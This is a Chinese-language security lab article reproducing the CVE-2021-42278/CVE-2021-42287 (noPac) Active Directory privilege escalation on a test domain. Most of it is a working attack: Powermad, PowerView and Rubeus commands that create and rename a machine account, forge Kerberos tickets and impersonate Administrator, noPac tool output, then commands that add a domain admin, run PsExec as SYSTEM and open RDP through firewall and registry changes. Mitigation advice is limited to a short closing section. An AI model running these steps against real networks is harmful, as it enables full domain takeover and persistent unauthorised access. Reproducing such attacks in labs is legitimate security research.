CVE-2021-42287-CVE-2021-42278 域內提權

星期五實驗室

閱讀須知

星期五實驗室的技術文章僅供參考,此文所提供的信息只為網絡安全人員對自己所負責的網站、服務器等(包括但不限于)進行檢測或維護參考,未經授權請勿利用文章中的技術資料對任何計算機系統進行入侵操作。利用此文所提供的信息造成的直接或間接后果和損失,均由使用者本人負責。

星期五實驗室擁有對此文章的修改、刪除和解釋權限,如轉載或傳播此文章,需保證文章的完整性,未經授權,不得用于其他。

01

背景及影響范圍

背景

2021 年 11 月 9 日,國外研究員在推特上發布了 Active Directory 相關的 CVE,CVE-2021-42278 & CVE-2021-42287 ,兩個漏洞組合可導致域內普通用戶權限提升至域管權限。

影響范圍

CVE-2021-42287:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

CVE-2021-42278:

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2019 (Server Core installation)

Windows Server 2022

Windows Server 2019

Windows Server 2012 R2 (Server Core installation)

02

漏洞介紹

• CVE-2021-42278,機器賬戶的名字一般來說應該以$結尾,但AD沒有對域內機器賬戶名做驗證。
• CVE-2021-42287,配合 CVE-2021-42278 使用,創建與域控機器賬戶名字相同的機器賬戶(不以$結尾),賬戶請求一個TGT后,更名賬戶,然后通過S4U2self 申請TGS Ticket,接著域控在 TGS_REP 階段,這個賬戶不存在的時候,DC會使用自己的密鑰加密 TGS Ticket ,提供一個屬于該賬戶的 PAC,然后我們就得到了一個高權限ST。

03

測試環境信息

域控win2016:

• 域名:vulntarget.com
• 賬號:administrator
• 密碼:admin@123
• 計算機名:WIN-UH20PRD3EAO //系統自帶的,沒改過

域成員win10:

• 賬號:vulntarget.comwin101
• 密碼:admin#123

04

復現測試

本次用兩種方式進行復現,分別是一步步請求獲取票據和使用工具直接兩步到位。

一步步請求獲取票據

利用 powermad.ps1 新增機器帳號

下載地址:

https://github.com/Kevin-Robertson/Powermad

Import-Module .Powermad.ps1New-MachineAccount -MachineAccount eval -Domain vulntarget.com -DomainController WIN-UH20PRD3EAO.vulntarget.com -Verbose

拿下域成員之后,很好定位到域控,得到域主機名,msf直接運行:run post/windows/gather/enum_domain

需要修改下策略

以管理員打開powershell(使用本地管理員就行,cmd管理員打開,uac驗證的時候,使用本地管理員的賬密,將域那個位置改為本地的機器名),運行參考:https://www.jianshu.com/p/a0a88d3bb787

Set-ExecutionPolicy RemoteSigned

執行之后,選擇Y就好。

添加用戶eval,設置一個密碼:admin123

New-MachineAccount -MachineAccount eval -Domain vulntarget.com -DomainController WIN-UH20PRD3EAO.vulntarget.com -Verbose

清除SPN信息

Set-DomainObject "CN=eval,CN=Computers,DC=vulntarget,DC=com" -Clear 'serviceprincipalname' -Verbose

使用Set-DomainObject需要加載模塊:powerview模塊,下載地址:

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1,直接右鍵保存,后綴為ps1就行。

重設機器名稱

Set-MachineAccountAttribute -MachineAccount eval -Value "WIN-UH20PRD3EAO" -Attribute samaccountname -Verbose//重設的機器名稱上面定位域控的時候就查詢到了,為WIN-UH20PRD3EAO,eval為剛才新建的用戶

請求TGT

.Rubeus.exe asktgt /user:WIN-UH20PRD3EAO /password:admin123 /domain:vulntarget.com /dc:WIN-UH20PRD3EAO.vulntarget.com /nowrap//password為剛才新建機器賬號時的密碼

修改機器的samaccountname值

將值修改回到原來的屬性

Set-MachineAccountAttribute -MachineAccount eval -Value "eval" -Attribute samaccountname -Verbose

獲取票據

利用剛剛申請的TGT進行S4U2self,模擬域內的域管去請求域控DC的ST票據,最終獲得域控制器DC的權限。

.Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:LDAP/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:doIFXDCCBVigAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NoiMwIaADAgECoRowGBsGa3JidGd0Gw52dWxudGFyZ2V0LmNvbaOCBBgwggQUoAMCARKhAwIBAqKCBAYEggQCiSaN7Tiezy9leFd3mpA1+1uTIIdouVoccMl3Qp+90weQdXBMJldg4t9a8F5Up/skzAg08Px74Jubld1YyT+qK0yv3/7YnFvZryleWV3VWJhn4DXwiwf2IUb28V8EDouuY7Z9s6nlm9GPVI03fHbZUuMMNzP6Nc5Pxk+6jm2NjgjdgX0ww5w41WvF1bluI2OOb8OVmYByP5a32dLDin9rLyglgw+NA8B1fhyuaHAZtHhXXKTY5EQfJ2eJc0mgAm8xk0XsGOeAKh/4LlRER5R5Rg19UKdh7lkx15M2IodyWHoEIvNdAtw2LteopcnckMduER+R6zY7Uloef1gg3B4iTMJmt9+BEIcXLITUVLqCjLFN/5Iugkf0LZoWNMfhlEZzlTcnORUHE4mBzsM8K01b0pFairByE66wwFaZhe4yh3Kvb8qcsYXeuY0D4gxqm+9pmfXXrKw5z1vzF1Ff2MCg4p2cuTU0tiyxUow7yY6T5Ae0f6siBoPi+SSnBKSPTu9wOvziCD5Cq2fxiMMMPoLY0x0mZSVf6tci11gUTLw2k0y4Yvtsd86zWnS2xpNPl8zDk42RWg+eKdiUARXIUu7WYWogbavl9/NGt+YcfttCWHX7vPRlZVhpppMYSAqJWQDHb8vAsPkMzID/tqmJO/FTt1kraKVQY2KACacDkrN/o5asNxLq5tKHkouH6qnHx3xY6hABONBV2c7l0HQ9BxNTkzVdGOVf6tQKfFoMZKdSSpWr4Pn9baR5NllqYr+FMDalfkhBOWkKhxOkcunbD8ABfJn6Rc2GQwpVDg3u5z7ndnt8vQhP5sYcXSz8XpjdU53Ddq89Kf1gwlKwR3zjusQfBM7u0EzPoz8Rxq1SqDar9HWooBfOOk5GJ5n93vjT76vlfQ9aLGnyTfBfJAOMcPFzXEt9xUrORPGdm93IR38f4m0WmU2jpIZJhbxmz8hDvEcQf+26PUaP7iZEZ5c492PfXKfl6zvkjPx0/iTdiTWl+uFuyrhB/f1WuQOyNzcs41ePprqLypenIjlmeo1ugJQM6B1F1NrnvO43bpmhjq+tSkAbGYumhDchDQQB4ezju2LPh+iK8COub04hguE06vCT2uiIi0ZGA+mmrAdAxRxTal4Aup4QZc8E5dmDwVD3KbzAkkbhtfXI7ZtUcb/T6EZRV56if1nlDp11c5x3OjwJwpKbvUL5Q1joJ1gMzQf/Mg2SkEMs4ShPxOpwrRdkhzhj+whhzi8O6QtG4gWiyT4nwlbirkZ7mY6eCiorRCXF4cPV1uBwWAHdKl4ckWIsI4C+tppNIByRH0nXbszoOnY4s5Xo5+Mmlj6sx9ff8I9sLULiT/G0ih6cupNbQLF3ms7jr6w+o4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagGzAZoAMCARehEgQQ1nRhtTe/YZYYjku02ZLU0qEQGw5WVUxOVEFSR0VULkNPTaIcMBqgAwIBAaETMBEbD1dJTi1VSDIwUFJEM0VBT6MHAwUAQOEAAKURGA8yMDIxMTIxMzEzMTUzOFqmERgPMjAyMTEyMTMyMzE1MzhapxEYDzIwMjExMjIwMTMxNTM4WqgQGw5WVUxOVEFSR0VULkNPTakjMCGgAwIBAqEaMBgbBmtyYnRndBsOdnVsbnRhcmdldC5jb20=

查詢票據

但是發現訪問不到域控,查看了下,對比nopac的payload,nopac使用的cifs服務,而這里使用的是ldap服務,將這里的ldap服務改為cifs服務即可:/altservice:LDAP,修改為:/altservice:cifs

原本:>.Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:LDAP/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:[base64 tgt]該服務即可:.Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:cifs/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:[base64 tgt]

修改后

.Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:cifs/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:doIFXDCCBVigAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NoiMwIaADAgECoRowGBsGa3JidGd0Gw52dWxudGFyZ2V0LmNvbaOCBBgwggQUoAMCARKhAwIBAqKCBAYEggQC6ha0sLmV5NFrig66k/5WB8xTFCVCHPMF1CVS7aalY5GCCUGLkPNb4W7g+lsijGS6T7hCNufoU/tMzrzmRpsihme5aK2mnZuqoEuMlAEzVpbFZR00CzZ7tG6zwobx7aE5XFecfwXjJBgh5ZE3lgNDB7QFRA/uJUuCfdmQsFytbXlJiNPee/ycuXG/Y6J908R33GQ6WB7sboht4zmgiHwWh38ZwXGLP9tGwg0psK0Jr9f2yU6s5wTiKvky5ABQLJClj+RNC/HlGTl+F7HLZek1uNw52DaIM4ghgF3FOHokiM66cPKVArKlVSmvUEtCncno1xLFhgcxZlOd6F+N7T1anVmO4gAxghftRaqrAzCgpg42w7jyWiJbht9740XG01fuMttkvrq1EiJtmGvSAHVx3oSf0jqlkjwLexZbtTu+8nY++WI195ZmiD4B4PsxubBIQWu6sa43T0v16NRg40P6nEe3Arh1hDZc6XPuCG19FOnTyPTJgCu8T4Df1Tr6oO8j07rYLuk2ozBeH/u3upyOOd0GRuSY3U8pqBNsZVrHfdPRCGvEVzK8zuEfKKN19EIdZVZL3WGAMFFQHxU700peSbmke68GpmuCzq5+3S0rE2lC1jSnXDIONQicgjX4Xbq65P9abNXymEsCu7i7NrU2O1jUaJemqUMod8cDuvd3ZeX+FooeeX/N+KZeuZaw24jTN46w7C4F2EWUX4eO1pkMocw31Hj6+OGXZfzLmf92PphIrEMz0+l8TdHkZ6cTZkx0FXo4bhcNh/4vLFQ9+LRprqT/Sk2auOqcDYAJIWQD4Fy5dhd8QlmUybwseWohk8y7GhGWalkKN7feVrs9OuZZO1V7xbK30AY2UR87R7hiDz7MQ/hQ0CWZLl15vuxSKbrG0gvMOxrGO4Za6Dfz1VoPS+kjV/oUueZVXwRCVgYf0t9PrLmlZ66PHwX2q20hvv42pg694Rgl6g8XdS0SiEf+yntjZ51Z8KXMlIA8Rk0o2aT6/b6nF4/jF7Mq/s4+VKwitPOksvvMF9zhscDbcqC31xwuEHb0H3DJaiKsMbxOea+8FztGvC48yjphC5VzLPvGrJqtlPmrCNKPZhV2TQqRi1uC0gJZ92nBbVnLGKHO058fd2XqZ3zHyr9YJTXzY7Q4k31LxbBF5H999noEyyTs3fkyJ5Uvihb71s1PJ3ZO14EWa55mYrH94gxL1HCl4YvCqCo2VXNAjU49XvylpeqCmReRLV3JMTOuemh/yQT0bKlC8Ou5cSMIXe+WX7y6IoHyKZGWTYGqe/6Ctfsw2LTGSw2iZuAD2EmuoibbQ3bIcEyJCalr/k0Yr0vbrPYW/vltzOd0UE76MtTLplBcd1Cy27rgo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagGzAZoAMCARehEgQQ24AjfZb2ZKzSNXPxMye416EQGw5WVUxOVEFSR0VULkNPTaIcMBqgAwIBAaETMBEbD1dJTi1VSDIwUFJEM0VBT6MHAwUAQOEAAKURGA8yMDIxMTIxMzE0MjExNFqmERgPMjAyMTEyMTQwMDIxMTRapxEYDzIwMjExMjIwMTQyMTE0WqgQGw5WVUxOVEFSR0VULkNPTakjMCGgAwIBAqEaMBgbBmtyYnRndBsOdnVsbnRhcmdldC5jb20=

自動化

利用腳本地址:

https://github.com/cube0x0/noPac,需要自己編譯為exe文件。

運行noPac.exe需要.net環境,下載地址:https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=17718

執行命令,查看是否存在漏洞,順便可以拿到域控的機器賬號,看到這里的票據大小為537,有師傅提醒說如果票據大于1000,就是添加了PAC,沒有這個漏洞了。

.noPac.exe scan -domain vulntarget.com -user win101 -pass admin#123     //賬號密碼為域成員win10的

可以看到是存在漏洞,能拿到票據。執行一下命令傳遞票據。

.noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt//這里會增加一個密碼為admin@123的機器賬號test

C:Userswin101DesktopPowermad-master>.noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt[+] Distinguished Name = CN=test,CN=Computers,DC=vulntarget,DC=com[+] Machine account test added[+] Machine account test attribute serviceprincipalname cleared[+] Machine account test attribute samaccountname updated[+] Got TGT for WIN-UH20PRD3EAO.vulntarget.com[+] Machine account test attribute samaccountname updated[*] Action: S4U[*] Using domain controller: WIN-UH20PRD3EAO.vulntarget.com (10.0.10.100)[*] Building S4U2self request for: 'WIN-UH20PRD3EAO@VULNTARGET.COM'[*] Sending S4U2self request[+] S4U2self success![*] Substituting alternative service name 'cifs/WIN-UH20PRD3EAO.vulntarget.com'[*] Got a TGS for 'administrator' to 'cifs@VULNTARGET.COM'[*] base64(ticket.kirbi):      doIFzDCCBcigAwIBBaEDAgEWooIEuDCCBLRhggSwMIIErKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NojEwL6ADAgEBoSgwJhsEY2lmcxseV0lOLVVIMjBQUkQzRUFPLnZ1bG50YXJnZXQuY29to4IEXjCCBFqgAwIBEqEDAgEDooIETASCBEirOVpwF2mskeBncTRkD5gQcgRUTZyU/OsEvtM7iT9ZOsJqBpkHZGvLILAvVCTiPcQ2SFaJxwWrvYzpNBNwrdriWoIOcSmbLc5DPSCvoLTkUIUZJWAX8czSuoleU/3dZ5gJpHUYKjPa/MEW/KWlr2hHE7IjgskiOrPy89MpIVQAI/iH1BvnoaVxEP6LNmQvrQXO9DOFvQigt3qh87Pc+n6bJ7HBBW6PTQiXTLlwDPLbJfuRU8UqTiUIpuS/hhT9nNTtzOF8Mb1SuXpYG97igldulsWHWlSs6gpFFe5wKtpGHluKUHWBOoQe4lZo/EgCmEGZfO/YNfIfiE7+fyLHMNfkecaDboKFi/6UKKihV5eTCwYAiaoDWuwBxMCOC1VbptozpyiSvFmwjtkYakK6DQKWdOSb4Ia2AXp3OEfTvcfq9cWQavNAOFMNR6txisCUko4+PCofEu9sL26w6vdqPnYLfie1aMLs/DWjavuWe6/8j2EcwX6vgvJYVXgSXQibnhVDbn7mf+4Tfaa4ht096fKX54j5ja9CjaElRuCogqW3TUeDSYUpjvMcpDPax0cLR/99/uZnx+s9BLda+jQX4lh3OmxtmUW8CjZS6Sv3XQW/CyhzD4B2RFPXk3Ya7j56F3Wikeq6yW9AHF2EuD+9fNpMhg2nydv9vtt19mAj2BfljXKWJz4EXnbT+sYEapcwchvufHQu6a2n/+iq2G9tjSkH6Z2Vnn8Ui+gJeTm2im+pVBntKR0CpnEAKlCtD3G5/RlqkZchY2zBPebMiyqx0mtBWqMMaTS3p0D//FLvX1oo3g80zShCelw4y+J3Z8MGZdUFw21Mckz9eIk5jt0VcX4h5snC/OlrMN7+yJAUl1tqC/O8tp4q2J9Jbqz+W5idJjNj1EGvnJ6kZ6owo/87qigObGchJKLZkS4wAuSe3kSh0PyirIBowjKJMVKtTg5ruW6y6cS+SGRLk5PRS7b9apSUKdH26XvXCLepH4s9Aje+fmLCPwzwVGp2+ErWeBOy6Pyi7malGE601/eg0M5XuaTc7EahgQuHY8KIZ8RBFJRrkMiULiBNctewgdm1bzRol0/GqtZT+5aH27klcGfLx3D8yUCylkl2o7sJVUwcNo6fYwtfElvm5JM9EiujfzDgkUTjSCSBrR9f/BihHNqYFVUfvhQDBAsL/6Lmo7nlMQN++Gq/oPukS5o6m/nykNwhbF178gtSE45jGKiGgBzvSFIkqI6I4JGxKJmpzk6UgoVL1BxguCkbgO/dlRhqvbjdSw5PrOph5KsiWkxwYuCvhCVs4EU23zvm0jrzhAsJwmQVVry9vhZLBRzagWSWEPD1g9vzIJoV/aO4GXgtcN/bbCfnodZ39SKosTinJ7E+tQpHipy+l54flXZHI9hapjpG5l7IvBScOARggTVaAV9L8fbvWyQJTjN8OgmF1L1DVQQnu03HBmCjqTIdo4H/MIH8oAMCAQCigfQEgfF9ge4wgeuggegwgeUwgeKgKzApoAMCARKhIgQg6IvCqN83Pz8hva8aEtoE655mm+mQdTAURKY5uKitJMGhEBsOVlVMTlRBUkdFVC5DT02iGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQAApQAApREYDzIwMjExMjE0MDEyNjA2WqYRGA8yMDIxMTIxNDExMjYwNlqnERgPMjAyMTEyMjEwMTI2MDZaqBAbDlZVTE5UQVJHRVQuQ09NqTEwL6ADAgEBoSgwJhsEY2lmcxseV0lOLVVIMjBQUkQzRUFPLnZ1bG50YXJnZXQuY29t[+] Ticket successfully imported!

在域控上會多一個機器賬號test

添加域管賬號

net user admin QWEasd@123 /add /domainnet group "Domain Admins" admin /add /domain

查看域管賬號是否添加成功

net group "domain admins" /domain

有了域控賬密,可以使用PsExec64.exe來對域控進行下一步的操作,開3389之類的。

PsExec64.exe -u  vulntargetadmin -i -p QWEasd@123 -s cmd.exe     //本地使用域控的cmd,-s使用system權限來運行,不然會被拒絕,執行不了一些命令

這里域控還沒有開啟3389。

嘗試開啟域控3389,修改防火墻策略。

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

開啟遠程:

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

使用新建的域控賬密登錄試試:

賬號:admin

密碼:QWEasd@123

遠程成功。

其他利用方式,自行操作。

05

修復建議

1. 微軟官方已推出補丁:KB5008602、KB5008380,或者更新windows系統
2. 通過域控的 ADSI 編輯器工具將 AD 域的 MAQ 配置為 0,中斷此漏洞的利用鏈。

參考鏈接:

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

FRIDAY LAB

星期五實驗室成立于2017年,匯集眾多技術研究人員,在工業互聯網安全前瞻技術研究方向上不斷進取。星期五實驗室由海內外知名高校的學院精英及來自于頂尖企業的行業專家組成,且大部分人員來自國際領先、國內知名的黑客戰隊——浙大AAA戰隊。作為木鏈科技專業的技術研發團隊,星期五實驗室憑借精湛的專業技術水平,為產品研發提供新思路、為行業技術革新探索新方向。